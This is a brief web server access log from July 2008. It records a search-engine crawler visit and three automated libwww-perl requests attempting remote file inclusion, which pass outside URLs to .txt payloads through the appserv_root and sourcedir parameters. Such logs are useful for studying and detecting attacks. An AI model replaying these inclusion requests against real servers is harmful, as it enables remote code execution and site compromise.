74.6.18.252 - - [28/Jul/2008:21:00:11 -0500] "GET /tattoo/links.htm HTTP/1.0" 200 1325 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.243.169.10 - - [28/Jul/2008:21:01:29 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
72.243.169.10 - - [28/Jul/2008:21:01:29 -0500] "GET //appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.110.51.10 - - [28/Jul/2008:21:02:41 -0500] "GET /?sourcedir=http://www.freewebs.com/dopeslave/id2.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
